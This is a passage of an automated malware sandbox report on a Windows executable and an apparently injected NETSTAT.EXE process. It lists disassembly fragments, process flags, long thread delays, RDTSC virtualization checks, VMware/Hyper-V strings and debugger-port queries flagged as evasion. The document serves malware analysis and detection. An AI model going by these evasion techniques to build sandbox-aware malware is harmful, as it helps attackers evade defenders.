          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B45C push eax; ret 4_2_0041B462
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0040F646 push edi; retf 4_2_0040F64A
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00415628 push ss; iretd 4_2_00415637
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00414E32 push ds; iretd 4_2_00414E33
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0348D0D1 push ecx; ret 10_2_0348D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096522D push esi; retf 10_2_00965240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B3A5 push eax; ret 10_2_0096B3F8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B3F2 push eax; ret 10_2_0096B3F8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B3FB push eax; ret 10_2_0096B462
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B45C push eax; ret 10_2_0096B462
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00964E32 push ds; iretd 10_2_00964E33
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00965628 push ss; iretd 10_2_00965637
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0095F646 push edi; retf 10_2_0095F64A
          Source: initial sampleStatic PE information: section name: .text entropy: 7.57888986763
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000009585E4 second address: 00000000009585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 000000000095896E second address: 0000000000958974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004088A0 rdtsc 4_2_004088A0
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe TID: 6944Thread sleep time: -59255s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe TID: 6972Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6020Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread delayed: delay time: 59255Jump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.720870223.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.748781487.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: NQBNpLezqZKv1P4.exeBinary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
          Source: explorer.exe, 00000005.00000000.720870223.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000005.00000000.725971847.000000000FD86000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}TT
          Source: explorer.exe, 00000005.00000000.745709839.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.721395078.000000000A715000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.721588911.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.715711377.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004088A0 rdtsc 4_2_004088A0
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00409B10 LdrLoadDll,4_2_00409B10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343DB40 mov eax, dword ptr fs:[00000030h]10_2_0343DB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344EF40 mov eax, dword ptr fs:[00000030h]10_2_0344EF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508B58 mov eax, dword ptr fs:[00000030h]10_2_03508B58
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343F358 mov eax, dword ptr fs:[00000030h]10_2_0343F358
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343DB60 mov ecx, dword ptr fs:[00000030h]10_2_0343DB60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344FF60 mov eax, dword ptr fs:[00000030h]10_2_0344FF60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508F6A mov eax, dword ptr fs:[00000030h]10_2_03508F6A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03463B7A mov eax, dword ptr fs:[00000030h]10_2_03463B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03463B7A mov eax, dword ptr fs:[00000030h]10_2_03463B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A70E mov eax, dword ptr fs:[00000030h]10_2_0346A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A70E mov eax, dword ptr fs:[00000030h]10_2_0346A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345F716 mov eax, dword ptr fs:[00000030h]10_2_0345F716
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F131B mov eax, dword ptr fs:[00000030h]10_2_034F131B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CFF10 mov eax, dword ptr fs:[00000030h]10_2_034CFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CFF10 mov eax, dword ptr fs:[00000030h]10_2_034CFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350070D mov eax, dword ptr fs:[00000030h]10_2_0350070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0350070D mov eax, dword ptr fs:[00000030h]10_2_0350070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03434F2E mov eax, dword ptr fs:[00000030h]10_2_03434F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03434F2E mov eax, dword ptr fs:[00000030h]10_2_03434F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346E730 mov eax, dword ptr fs:[00000030h]10_2_0346E730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B53CA mov eax, dword ptr fs:[00000030h]10_2_034B53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B53CA mov eax, dword ptr fs:[00000030h]10_2_034B53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]10_2_034603E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]10_2_034603E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]10_2_034603E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]10_2_034603E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]10_2_034603E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034603E2 mov eax, dword ptr fs:[00000030h]10_2_034603E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034737F5 mov eax, dword ptr fs:[00000030h]10_2_034737F5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F138A mov eax, dword ptr fs:[00000030h]10_2_034F138A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03441B8F mov eax, dword ptr fs:[00000030h]10_2_03441B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03441B8F mov eax, dword ptr fs:[00000030h]10_2_03441B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034ED380 mov ecx, dword ptr fs:[00000030h]10_2_034ED380
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03448794 mov eax, dword ptr fs:[00000030h]10_2_03448794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462397 mov eax, dword ptr fs:[00000030h]10_2_03462397
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346B390 mov eax, dword ptr fs:[00000030h]10_2_0346B390
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h]10_2_034B7794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h]10_2_034B7794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B7794 mov eax, dword ptr fs:[00000030h]10_2_034B7794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h]10_2_03464BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h]10_2_03464BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03464BAD mov eax, dword ptr fs:[00000030h]10_2_03464BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03505BA5 mov eax, dword ptr fs:[00000030h]10_2_03505BA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]10_2_03439240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]10_2_03439240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]10_2_03439240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439240 mov eax, dword ptr fs:[00000030h]10_2_03439240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]10_2_03447E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]10_2_03447E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]10_2_03447E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]10_2_03447E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]10_2_03447E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03447E41 mov eax, dword ptr fs:[00000030h]10_2_03447E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034C4257 mov eax, dword ptr fs:[00000030h]10_2_034C4257
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344766D mov eax, dword ptr fs:[00000030h]10_2_0344766D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EB260 mov eax, dword ptr fs:[00000030h]10_2_034EB260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EB260 mov eax, dword ptr fs:[00000030h]10_2_034EB260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508A62 mov eax, dword ptr fs:[00000030h]10_2_03508A62
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]10_2_0345AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]10_2_0345AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]10_2_0345AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]10_2_0345AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345AE73 mov eax, dword ptr fs:[00000030h]10_2_0345AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347927A mov eax, dword ptr fs:[00000030h]10_2_0347927A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h]10_2_0343C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h]10_2_0343C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C600 mov eax, dword ptr fs:[00000030h]10_2_0343C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03468E00 mov eax, dword ptr fs:[00000030h]10_2_03468E00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03448A0A mov eax, dword ptr fs:[00000030h]10_2_03448A0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343AA16 mov eax, dword ptr fs:[00000030h]10_2_0343AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343AA16 mov eax, dword ptr fs:[00000030h]10_2_0343AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03453A1C mov eax, dword ptr fs:[00000030h]10_2_03453A1C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A61C mov eax, dword ptr fs:[00000030h]10_2_0346A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346A61C mov eax, dword ptr fs:[00000030h]10_2_0346A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343E620 mov eax, dword ptr fs:[00000030h]10_2_0343E620
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03474A2C mov eax, dword ptr fs:[00000030h]10_2_03474A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03474A2C mov eax, dword ptr fs:[00000030h]10_2_03474A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EFE3F mov eax, dword ptr fs:[00000030h]10_2_034EFE3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03478EC7 mov eax, dword ptr fs:[00000030h]10_2_03478EC7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508ED6 mov eax, dword ptr fs:[00000030h]10_2_03508ED6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034636CC mov eax, dword ptr fs:[00000030h]10_2_034636CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462ACB mov eax, dword ptr fs:[00000030h]10_2_03462ACB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034EFEC0 mov eax, dword ptr fs:[00000030h]10_2_034EFEC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462AE4 mov eax, dword ptr fs:[00000030h]10_2_03462AE4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034616E0 mov ecx, dword ptr fs:[00000030h]10_2_034616E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034476E2 mov eax, dword ptr fs:[00000030h]10_2_034476E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034CFE87 mov eax, dword ptr fs:[00000030h]10_2_034CFE87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346D294 mov eax, dword ptr fs:[00000030h]10_2_0346D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346D294 mov eax, dword ptr fs:[00000030h]10_2_0346D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]10_2_034352A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]10_2_034352A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]10_2_034352A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]10_2_034352A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034352A5 mov eax, dword ptr fs:[00000030h]10_2_034352A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B46A7 mov eax, dword ptr fs:[00000030h]10_2_034B46A7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344AAB0 mov eax, dword ptr fs:[00000030h]10_2_0344AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344AAB0 mov eax, dword ptr fs:[00000030h]10_2_0344AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h]10_2_03500EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h]10_2_03500EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03500EA5 mov eax, dword ptr fs:[00000030h]10_2_03500EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346FAB0 mov eax, dword ptr fs:[00000030h]10_2_0346FAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345B944 mov eax, dword ptr fs:[00000030h]10_2_0345B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345B944 mov eax, dword ptr fs:[00000030h]10_2_0345B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03473D43 mov eax, dword ptr fs:[00000030h]10_2_03473D43
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034B3540 mov eax, dword ptr fs:[00000030h]10_2_034B3540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03457D50 mov eax, dword ptr fs:[00000030h]10_2_03457D50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343C962 mov eax, dword ptr fs:[00000030h]10_2_0343C962
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B171 mov eax, dword ptr fs:[00000030h]10_2_0343B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343B171 mov eax, dword ptr fs:[00000030h]10_2_0343B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345C577 mov eax, dword ptr fs:[00000030h]10_2_0345C577
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345C577 mov eax, dword ptr fs:[00000030h]10_2_0345C577
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439100 mov eax, dword ptr fs:[00000030h]10_2_03439100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439100 mov eax, dword ptr fs:[00000030h]10_2_03439100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03439100 mov eax, dword ptr fs:[00000030h]10_2_03439100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03508D34 mov eax, dword ptr fs:[00000030h]10_2_03508D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]10_2_03454120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]10_2_03454120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]10_2_03454120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov eax, dword ptr fs:[00000030h]10_2_03454120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120 mov ecx, dword ptr fs:[00000030h]10_2_03454120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03443D34 mov eax, dword ptr fs:[00000030h]10_2_03443D34
